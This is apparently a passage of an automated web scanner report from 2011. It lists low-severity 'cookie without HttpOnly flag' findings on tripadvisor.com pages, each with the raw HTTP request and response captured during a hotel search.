Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; popunder=yes; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:47 GMT
Server: Apache
Set-Cookie: JSESSIONID=85194181F8EF5609A9FA7C933BC61666.p0522; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.56
P3P: policyref="http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/p3p/p3p.xml",CP="NOI DSP CURa ADMa DEVa OUR IND UNI COM NAV"
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Content-Type: text/javascript;charset=ISO-8859-1
Connection: close
Content-Length: 2401

var DrfGlobals = {
   sid:"bfa7dd53-c988-458c-86df-52443affccb8", // session id
   pid:"c3919e40-e5b8-49f8-b876-4fed1f31968f", // publisher id
   pti:"default", // page type id
   src:"none", // source
   
...[SNIP]...
14.76. http://www.tripadvisor.com/CheckMore  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /CheckMore

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CheckMore?detail=258705&storedUserData=inMonth%3D10%25202011%26inDay%3D14%26outMonth%3D10%25202011%26outDay%3D16%26adults%3DNaN%26pid%3D4799&vendorsChecked=BookingCom__HotelsCom2__Expedia__VenereHotelsLOWUS&vendorsOpened=BookingCom__HotelsCom2__Expedia&a=QC_Inline&s=SmartDeals&av=true&avLocId=258705 HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; ServerPool=T; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3Brev03b%3A8754%3Bbak02b%3A5465%3Bmed02b%3A8739%3B; CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; TAReturnTo=%1%%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.3*MC.11893*LS.SmartDeals*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.2*TRA.true*LL.971922*LD.60745*EWS.SmartDeals; TACds=C.2.11007.0.2011-10-02

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:04 GMT
Server: Apache
pragma: no-cache
cache-control: no-cache,no-store,must-revalidate
expires: 0
Set-Cookie: TATravelInfo=V2*AY.2011*AM.10*AD.14*DY.2011*DM.10*DD.16*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 01:02:04 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.6*MC.11893*LS.CheckMore_SmartDeals*PD-2147.1*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.94*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*CU.USD*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.4139280*LD.258705*EWS.CheckMore; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=T; Domain=.tripadvisor.com; Path=/
Set-Cookie: PassThruUrlArgs=null; Domain=.tripadvisor.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 16671
Connection: close
Content-Type: text/html;charset=UTF-8

<div id="CHECK_MORE_SITES_LB" class="checking_rates">
<dl class="property zoom_wrap">
<dt class="heading">
You're checking rates on: </dt>
<dd class="details zoom_wrap">
<img class="thumbnail" src="ht
...[SNIP]...
14.77. http://www.tripadvisor.com/Commerce  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /Commerce

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Commerce?p=Expedia&src=32623573&geo=258705&matchID=1&from=HotelDateSearch_SmartDeals&area=QC_Inline&slot=1&cnt=6&oos=4&silo=910&bucket=1739&ttype=Hotel&inMonth=10%202011&inDay=14&outMonth=10%202011&outDay=16&adults=NaN&pid=4799 HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3Brev03b%3A8754%3Bbak02b%3A5465%3Bmed02b%3A8739%3B; CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; TAReturnTo=%1%%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html; TACds=C.2.11007.0.2011-10-02; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.4*MC.11893*LS.HotelCheckRates*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.0*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.971923*LD.60745*EWS.SmartDeals; ServerPool=T

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 01:01:57 GMT
Server: Apache
pragma: no-cache
cache-control: no-cache,no-store,must-revalidate
expires: 0
Set-Cookie: TATravelInfo=V2*AY.2011*AM.10*AD.14*DY.2011*DM.10*DD.16*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 01:01:57 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.5*MC.11893*LS.HotelCheckRates*PD-2332.1*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.6*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.971923*LD.60745*EWS.SmartDeals; Domain=.tripadvisor.com; Path=/
Set-Cookie: PCT=%7B%22p-2332%22%3A1%7D; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=T; Domain=.tripadvisor.com; Path=/
Location: http://www.expedia.com/pubspec/scripts/eap.asp?GOTO=HotAvail&HotID=894999&InDate=10/14/11&OutDate=10/16/11&NumAdult=2&NumChild=0&eapid=21187-1&ICMCID=TRIPA.Expedia_US-H_B4.11893.T&ICMDTL=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US..
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html;charset=UTF-8

14.78. http://www.tripadvisor.com/HotelCheckRates  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /HotelCheckRates

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /HotelCheckRates?Action=AddBoomerangTag HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
Content-Length: 55
Origin: http://www.tripadvisor.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; ServerPool=T; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3Brev03b%3A8754%3Bbak02b%3A5465%3Bmed02b%3A8739%3B; CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; TAReturnTo=%1%%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.3*MC.11893*LS.SmartDeals*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.2*TRA.true*LL.971922*LD.60745*EWS.SmartDeals; TACds=C.2.11007.0.2011-10-02

checkIn=10%2F14%2F2011&checkOut=10%2F16%2F2011&adults=2

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:05 GMT
Server: Apache
pragma: no-cache
cache-control: no-cache,no-store,must-revalidate
expires: 0
Set-Cookie: TATravelInfo=V2*AY.2011*AM.10*AD.14*DY.2011*DM.10*DD.16*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 01:02:05 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.7*MC.11893*LS.HotelCheckRates*PD-2147.1*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.25*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*CU.USD*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.4139281*LD.258705*EWS.CheckMore; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=T; Domain=.tripadvisor.com; Path=/
Set-Cookie: PassThruUrlArgs=null; Domain=.tripadvisor.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 19
Connection: close
Content-Type: text/html;charset=UTF-8

<!--check rates-->
14.79. http://www.tripadvisor.com/SmartDeals-g1-m11893  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /SmartDeals-g1-m11893

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /SmartDeals-g1-m11893?&q=bos&checkin=10/9/2011&checkout=10/16/2011&adults=1 HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; TACds=A.1.11539.1.2011-10-02

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 00:37:46 GMT
Server: Apache
Set-Cookie: TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 00:37:46 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.3*MC.11893*LS.SmartDeals*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.50*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*FS.37*TRA.true*LL.971922*LD.60745*EWS.SmartDeals; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=T; Domain=.tripadvisor.com; Path=/
Set-Cookie: PassThruUrlArgs=%1%a_checkin.10%2F9%2F2011-qbos-a_adults.1-m11893-a_checkout.10%2F16%2F2011; Domain=.tripadvisor.com; Expires=Mon, 10-Oct-2011 00:37:46 GMT; Path=/
Location: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=utf-8

14.80. http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; TACds=A.1.11539.1.2011-10-02; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.1*MC.11893*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.37*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*TRA.true; ServerPool=T; PassThruUrlArgs=%1%a_checkin.10%2F9%2F2011-qbos-a_adults.1-m11893-a_checkout.10%2F16%2F2011; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3B

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:38:20 GMT
Server: Apache
pragma: no-cache
cache-control: no-cache,no-store,must-revalidate
expires: 0
Set-Cookie: TATravelInfo=V2*AC.DFW*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 00:38:21 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.58*MC.13091*LS.SmartDeals*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.37*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*CU.USD*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals%5C.html*FS.37*TRA.true*LL.971922*LD.60745*EWS.SmartDeals; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=T; Domain=.tripadvisor.com; Path=/
Set-Cookie: CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 00:38:21 GMT; Path=/
Set-Cookie: PassThruUrlArgs=null; Domain=.tripadvisor.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 356474
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="content-type" content="text/html
...[SNIP]...
14.81. http://www.tripadvisor.com/img/cdsi/img2/ratings/partner/e5.0-13878-5.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /img/cdsi/img2/ratings/partner/e5.0-13878-5.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/cdsi/img2/ratings/partner/e5.0-13878-5.gif HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-Hotel-Commonwealth.h894999.Hotel-Information?icmcid=TRIPA.Expedia_US-H_B4.11893.T&icmdtl=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US..&chkin=10/14/11&hashTag=roomsAndRates&chkout=10/16/11&eapid=21187-1&rm1=a2&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3Brev03b%3A8754%3Bbak02b%3A5465%3Bmed02b%3A8739%3B; CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; TAReturnTo=%1%%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html; TACds=C.2.11007.0.2011-10-02; TATravelInfo=V2*AY.2011*AM.10*AD.14*DY.2011*DM.10*DD.16*A.2*MG.-1*HP.2*FL.3; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.5*MC.11893*LS.HotelCheckRates*PD-2147.1*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.58*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.971923*LD.60745*EWS.SmartDeals; PCT=%7B%22p-2147%22%3A1%7D; ServerPool=T

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:16 GMT
Server: Apache
expires: Mon, 03 Oct 2011 01:00:00 GMT
cache-control: max-age=43200
Last-Modified: Sun, 02 Oct 2011 01:00:00 GMT
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.6*MC.11893*LS.HotelCheckRates*PD-2147.1*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.expedia%5C.com%2FBoston-Hotels-Hotel-Commonwealth%5C.h894999%5C.Hotel-Information%3Ficmdtl%3DMT1110027Z3xeMPeET6itK0Qu1f-JQAAU%5C.894999%5C.HDSSDeE%5C.T%5C.QCI%5C.258705%5C.ch%5C.668%5C.60745%5C.en_US%5C.%5C.%3Fchkin%3D10%2F14%2F11%3FhashTag%3DroomsAndRates%3Fchkout%3D10%2F16%2F11%3Feapid%3D21187-1%3Frm1%3Da2%3F*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.971923*LD.60745*EWS.SmartDeals; Domain=.tripadvisor.com; Path=/
Set-Cookie: TACds=C.3.13878.5.2011-10-02; Domain=.tripadvisor.com; Expires=Fri, 02-Dec-2011 01:02:16 GMT; Path=/
Connection: close
Content-Type: image/gif
Content-Length: 2673

GIF89aC..............t......rtrd.N...z.g),*.................p...n.Y[.Edd].........CEC.......\j............]T7.............................RUU.......... 4............STOC=).tL.....].....T..A...X.B....
...[SNIP]...
14.82. http://www.tripadvisor.com/img/cdsi/img2/ratings/traveler/3.0-11539-1.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /img/cdsi/img2/ratings/traveler/3.0-11539-1.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/cdsi/img2/ratings/traveler/3.0-11539-1.gif HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
